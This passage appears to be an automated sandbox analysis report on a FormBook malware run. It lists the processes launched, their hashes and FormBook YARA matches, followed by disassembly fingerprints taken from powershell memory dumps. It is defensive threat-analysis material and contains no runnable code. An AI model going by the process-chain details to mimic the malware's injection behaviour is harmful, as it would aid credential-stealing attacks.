                                Path:C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe"
                                Imagebase:0x5d0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Has exited:false

                                General

                                Target ID:22
                                Start time:17:14:40
                                Start date:02/05/2024
                                Path:C:\Windows\SysWOW64\xcopy.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\xcopy.exe"
                                Imagebase:0x840000
                                File size:43'520 bytes
                                MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Has exited:false

                                General

                                Target ID:23
                                Start time:17:14:57
                                Start date:02/05/2024
                                Path:C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe"
                                Imagebase:0x5d0000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                Has exited:false

                                General

                                Target ID:24
                                Start time:17:15:02
                                Start date:02/05/2024
                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                Imagebase:0xeb0000
                                File size:516'608 bytes
                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:25
                                Start time:17:15:03
                                Start date:02/05/2024
                                Path:C:\Windows\System32\rundll32.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                Imagebase:0x7ff78c940000
                                File size:71'680 bytes
                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:26
                                Start time:17:15:10
                                Start date:02/05/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                General

                                Target ID:27
                                Start time:17:15:11
                                Start date:02/05/2024
                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                Imagebase:0xeb0000
                                File size:516'608 bytes
                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FFD348CCAE6 Relevance: .5, Instructions: 472COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3556167804.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd348c0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a568654343e531ecf95ee0cde3b482e57d908d230ab2d3e82a747c11776f34e9
                                  • Instruction ID: 54ea1afb4ea757a5b84f23351b8a446689c54b6055b9052696ac89b6b1f5c65f
                                  • Opcode Fuzzy Hash: a568654343e531ecf95ee0cde3b482e57d908d230ab2d3e82a747c11776f34e9
                                  • Instruction Fuzzy Hash: C0F1A530A0CA8D8FEBA8DF28C8557E977E1FF55310F04426EE84DC7291DB78A9459B81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFD348CD892 Relevance: .5, Instructions: 458COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3556167804.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd348c0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25c02bd769c0237c36eb25ac2d0aea7da188bec5354e5f7c09391f80ca61c7e2
                                  • Instruction ID: 6c11b253dd3b44d61de574feaef336cc4b9947be7e65d4936bd357a70d236b0f
                                  • Opcode Fuzzy Hash: 25c02bd769c0237c36eb25ac2d0aea7da188bec5354e5f7c09391f80ca61c7e2
                                  • Instruction Fuzzy Hash: B0E1B330A08A8D4FEBA8EF28C8A57E977D1FF55314F14826ED84DC7291DF78A8458781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFD34994C8E Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3557720798.00007FFD34990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34990000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd34990000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0c2d55766d5780a6563518d46255dcc844964d3c787857b815053eab1915d8d4
                                  • Instruction ID: 5e36261780258a697c6bc2f3ead42958b26975fd9c1c03cf981c86e7af626dbb
                                  • Opcode Fuzzy Hash: 0c2d55766d5780a6563518d46255dcc844964d3c787857b815053eab1915d8d4
                                  • Instruction Fuzzy Hash: D2112C22B0D6858FE756DB9854A41F877D1FF5A315F0441BFC54CC7187EA299805C361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFD348C3945 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3556167804.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd348c0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                  • Instruction ID: da95bdfc6eb9e811aa1a8f7df450428970470423d6c469c22652fa1c10bed460
                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                  • Instruction Fuzzy Hash: 4D01677121CB0D4FD744EF4CE491AA5B7E0FB99364F10056EE58AC3651D636E882CB45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00007FFD348C3BFB Relevance: .7, Instructions: 683COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3556167804.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd348c0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 718d6bad04cff8e8212b843b96290ce63fb9c7f52cc82743bc6734a9193f5ca7
                                  • Instruction ID: b07f945ffb2600df43736022d70386d39095349d3ac92a2ca01da26e44965f8c
                                  • Opcode Fuzzy Hash: 718d6bad04cff8e8212b843b96290ce63fb9c7f52cc82743bc6734a9193f5ca7
                                  • Instruction Fuzzy Hash: 06221532B08A4A8FDB55EBACD4E25E97BF0EF56321B080177C149C7193DE38A8468791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFD348C6238 Relevance: .5, Instructions: 481COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3556167804.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd348c0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0f59406204f05ba6ab31bb6bc115db80069cd6254fa274fd5e3d691ea12f19d2
                                  • Instruction ID: db5c874656c00e59736ee07a2294711b312a93950e9b99e7aa99756523d33204
                                  • Opcode Fuzzy Hash: 0f59406204f05ba6ab31bb6bc115db80069cd6254fa274fd5e3d691ea12f19d2
                                  • Instruction Fuzzy Hash: C2E11562A0D6964FE352DF6C95F51E5BBE0EF53324B1801BBC189CB0A3ED2D6C069351
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFD348C2658 Relevance: .2, Instructions: 174COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3556167804.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd348c0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b09cbdd1d5d56f9719e3d7fd708c442eb80bb0df0ff6b563fc3e8f3f7ab993c
                                  • Instruction ID: d4a2772fb043b87cc6c62be90a387d83d4dfe164343a757482dcc54363b82105
                                  • Opcode Fuzzy Hash: 5b09cbdd1d5d56f9719e3d7fd708c442eb80bb0df0ff6b563fc3e8f3f7ab993c
                                  • Instruction Fuzzy Hash: DC514C66E0EBC25FF763967C59B6095BFA0DF5326470911F7C684CA0E3AD1D1C0A9222
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00007FFD348C53F0 Relevance: .1, Instructions: 91COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3556167804.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd348c0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8336d09fb744902b93e6510cce2af8fba6b036a84f85dcd180743832f76099a7
                                  • Instruction ID: f26e5dd6de7e62687ccf2e284c3d7c1362560a7627169e30a11f9e2f3de0bda2
                                  • Opcode Fuzzy Hash: 8336d09fb744902b93e6510cce2af8fba6b036a84f85dcd180743832f76099a7
                                  • Instruction Fuzzy Hash: 9E21C597B0E2B21BFA9153BC69F70EA6BD4EF5326570911B3C588C60A3AD0D2C075592
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  Function 08451010 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: \Vqk
                                  • API String ID: 0-619367779
                                  • Opcode ID: b659a3dcb7672a735459380db73dde9bf8396178b76a0317ad46b7e3bef05296
                                  • Instruction ID: 2ba63e257c17172a2f0864732e1e7c3439642134ff10bd1bdae9bdd4127d5613
                                  • Opcode Fuzzy Hash: b659a3dcb7672a735459380db73dde9bf8396178b76a0317ad46b7e3bef05296
                                  • Instruction Fuzzy Hash: 6CB14970E00249CFDF10CFA9C9957AEBBF2AF88715F14812AE815A7355EB749846CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 084518E0 Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c86072296b232a54bd4df0fcfe82bbca9d43d09c6ee03cf8d5b32652ecf2a0be
                                  • Instruction ID: 7b09c77a11dd753200ce3dab5caa4d3fcf55be979cabf5773a71d4721f636092
                                  • Opcode Fuzzy Hash: c86072296b232a54bd4df0fcfe82bbca9d43d09c6ee03cf8d5b32652ecf2a0be
                                  • Instruction Fuzzy Hash: 17B16D70E00209CFDF10CFA9C9817AEBBF2AF88315F14852AE815A7395EB749845CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0308D848 Relevance: 6.8, Strings: 5, Instructions: 517COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8Nqk$h]qk$h]qk$h]qk$Iqk
                                  • API String ID: 0-787822237
                                  • Opcode ID: b60844457a8d76871dc30da3d805793dd2f02af2ed0fa0b85ba8fa812ea3c17a
                                  • Instruction ID: fe76f986b86b38ea3b6dad1529fe7f371cccd96d836424da9b1db726fc76d7e5
                                  • Opcode Fuzzy Hash: b60844457a8d76871dc30da3d805793dd2f02af2ed0fa0b85ba8fa812ea3c17a
                                  • Instruction Fuzzy Hash: 12226D34B02214CFDB65EB24C954AAEB7F6BF89304F1485A9D44AAB391CF359D81CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0308E500 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h]qk$Iqk
                                  • API String ID: 0-2504219488
                                  • Opcode ID: 016bbe8628e0b069041901cdf764712a1ac6666d58af1c6063419a0e4c1c33a1
                                  • Instruction ID: f3a8a952fb4d93bb7c9affef07f49204c0ef7f3499d53362cdf7691718a6eb99
                                  • Opcode Fuzzy Hash: 016bbe8628e0b069041901cdf764712a1ac6666d58af1c6063419a0e4c1c33a1
                                  • Instruction Fuzzy Hash: 21318D30B02218CFCB25EB64C8956EEB7B2BF8A304F1445E9D449AB351CB359E81CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08451007 Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: \Vqk
                                  • API String ID: 0-619367779
                                  • Opcode ID: 6231b8d20333e96430e3804e934eb84e2ae7d349efc14ca7c5c4249c5a16b7dd
                                  • Instruction ID: d6f89886f134dd4922fd857a920fd906a6794641fd0a235a16a7c30e293ab521
                                  • Opcode Fuzzy Hash: 6231b8d20333e96430e3804e934eb84e2ae7d349efc14ca7c5c4249c5a16b7dd
                                  • Instruction Fuzzy Hash: B6B16870E00209CFDB10CFA9C99579EBBF2BF88715F14812AE815E7395EB749846CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07648C30 Relevance: .8, Instructions: 773COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3f2c3209dc103bd6e89fc13ea792187d93ec82a99809d98c4635887084df64f
                                  • Instruction ID: f69b3635452a472b44562efe74e8a351ead7bf21acfa3b1d706935a2168d3774
                                  • Opcode Fuzzy Hash: d3f2c3209dc103bd6e89fc13ea792187d93ec82a99809d98c4635887084df64f
                                  • Instruction Fuzzy Hash: 136291B4E00315CFEB24DB68C844B9ABBB2AFC5704F148169D50AAB755DB71EC82CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07647968 Relevance: .7, Instructions: 741COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4300ab90a04b5d60a38687e82831f2129479d4327950f1d250765a7e0c381a5
                                  • Instruction ID: d69f1d1e985a4c519fa0d74b2753a5fe63a5e1ad22203b01b6acccc9ce19e6cc
                                  • Opcode Fuzzy Hash: f4300ab90a04b5d60a38687e82831f2129479d4327950f1d250765a7e0c381a5
                                  • Instruction Fuzzy Hash: 9B625CB4B00206DFDB14DBA8C544BAEBBB2AF85744F24C069D90A9F755DB72EC42CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08454848 Relevance: .7, Instructions: 729COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5740ca929654450ed2e86e224d00736b452444346d0b95a521514b65b5cbabf
                                  • Instruction ID: b6c54694fda17ab9dcddc3054d8af6d2c55bee597125b8e6b3e59dacbb669b7c
                                  • Opcode Fuzzy Hash: f5740ca929654450ed2e86e224d00736b452444346d0b95a521514b65b5cbabf
                                  • Instruction Fuzzy Hash: 0B623D74A05249DFDB05CF98D484A9EFBB2FF88310F25815AE844AB352C735ED82CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07647962 Relevance: .5, Instructions: 545COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cc662b7880fb6648909b1a36865b89c0156ab6ddd753de90f096afee5bbb89ef
                                  • Instruction ID: 3c5bddedea36e5bcc559143cff8f46ed4b43734e47914d3ded2e9443f4a81fc6
                                  • Opcode Fuzzy Hash: cc662b7880fb6648909b1a36865b89c0156ab6ddd753de90f096afee5bbb89ef
                                  • Instruction Fuzzy Hash: 353229B4A00206DFDB14CBA8C544B99B7B2BF85714F25C0A9D90AAF755CB72EC82CF41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 076480DD Relevance: .5, Instructions: 483COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b626834704e5073735479dffc098bfce69ed99f1d7d3d9ea8d75e826ada7e6e
                                  • Instruction ID: 8b61fdd5760c2b7eb464e9651d64e55433ea22c70341a7a404527096d982b19a
                                  • Opcode Fuzzy Hash: 0b626834704e5073735479dffc098bfce69ed99f1d7d3d9ea8d75e826ada7e6e
                                  • Instruction Fuzzy Hash: B1123AB4A00206DFDB14CF98C544BAABBB2BF85744F25C069E90A9F355DB72EC46CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08457060 Relevance: .4, Instructions: 435COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 708caf60626fddf0920beca73772bdf399ddc8aa90010441d8ffedf34e962cbf
                                  • Instruction ID: 1fb9b637d6bfb0bbeb1d34db9e765b9bf6d947f0f19e90047e4a8ec25c4dbfd2
                                  • Opcode Fuzzy Hash: 708caf60626fddf0920beca73772bdf399ddc8aa90010441d8ffedf34e962cbf
                                  • Instruction Fuzzy Hash: 4D020C75A00219DFDB15CF98D584AAEBBB2FF88310F24856AE905AB351C771ED41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 084523E8 Relevance: .4, Instructions: 397COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2877330983.0000000008450000.00000040.00000800.00020000.00000000.sdmp, Offset: 08450000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_8450000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7955e05f6bc383cffcc90821d7c3d25c474781167756bbac498385c93ed77955
                                  • Instruction ID: b409efe0a1fae43a0dd00e72c4b0b5edae8ca27bec5ca66e8dbc2f2ed1af8226
                                  • Opcode Fuzzy Hash: 7955e05f6bc383cffcc90821d7c3d25c474781167756bbac498385c93ed77955
                                  • Instruction Fuzzy Hash: B9F13F34A05259DFDB05CFA8D490A9EBFB2FF49310F15819AE844AB362C775EC46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 076492AB Relevance: .4, Instructions: 387COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f3d3b0a7f57e8fed17c97cdd4cae32c6d1e7e667cfb1ddf9f516752c53f2bbe3
                                  • Instruction ID: db36bba29ef2edaa8ddafa0a986fa2574859e6ce31c46801c9ab757141a01728
                                  • Opcode Fuzzy Hash: f3d3b0a7f57e8fed17c97cdd4cae32c6d1e7e667cfb1ddf9f516752c53f2bbe3
                                  • Instruction Fuzzy Hash: BEF1A1B4A40215DFEB24DB68C854F9ABBB3AFC4344F10C0A9D50AAF791DB71EC818B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0308C040 Relevance: .4, Instructions: 352COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e23b89c0905c58d61d4a494d934655077ae3c95d02976a4dd0b03fdcf1f0227c
                                  • Instruction ID: 351b9d463cb71889e7d3a1473243362908e5d66cd2b207511759fe5cdedd41c5
                                  • Opcode Fuzzy Hash: e23b89c0905c58d61d4a494d934655077ae3c95d02976a4dd0b03fdcf1f0227c
                                  • Instruction Fuzzy Hash: C3E1F874A012099FDB45DFA8D484A9DFBF2FF89310F288159E845AB751C771ED81CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0764A308 Relevance: .3, Instructions: 339COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2871834426.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7640000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a7e02a9167b0d77b25357b7da0ff94a8d76527b8f62c1507c4f7ab793d2b2d2
                                  • Instruction ID: bdca502d371b61e1c30db78c26716813a90c4bd9962c934fe6597c800055e250
                                  • Opcode Fuzzy Hash: 1a7e02a9167b0d77b25357b7da0ff94a8d76527b8f62c1507c4f7ab793d2b2d2
                                  • Instruction Fuzzy Hash: 66D1A0B4A40205EFE718DFA8C454B9EBBA2AFC4744F14C029D506AF795CB71EC52CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0308AD90 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 314e33d00b83e16d1743819d2e01ae0b886b4785139fdf3b44a562e38a4ea028
                                  • Instruction ID: fe47bc0722865da7ae615d32a1f80ba98830ce26d89993deac550feafc2f880d
                                  • Opcode Fuzzy Hash: 314e33d00b83e16d1743819d2e01ae0b886b4785139fdf3b44a562e38a4ea028
                                  • Instruction Fuzzy Hash: 1EC19E35A012088FDB14EFA8C544A9DBBF6FF85314F158659E846AF365CB34ED49CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03083670 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2838665217.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_3080000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 26dd8fb4fb9434b21b1551813392232c0df72308cd5fe5d3786ecece3cc15162
                                  • Instruction ID: 5c6b188b6e2840ec5b235746cf3f764eaeeeefcc9237ae9c5132565b1426f7ae
                                  • Opcode Fuzzy Hash: 26dd8fb4fb9434b21b1551813392232c0df72308cd5fe5d3786ecece3cc15162
                                  • Instruction Fuzzy Hash: 1DD1F778A01249DFDB45DFA8D484A9DFBF2BF88310F248599E854AB361C735ED42CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 08456C08 Relevance: .3, Instructions: 307COMMON
                                  Download Yara Rule
                                  Memory Dump Source
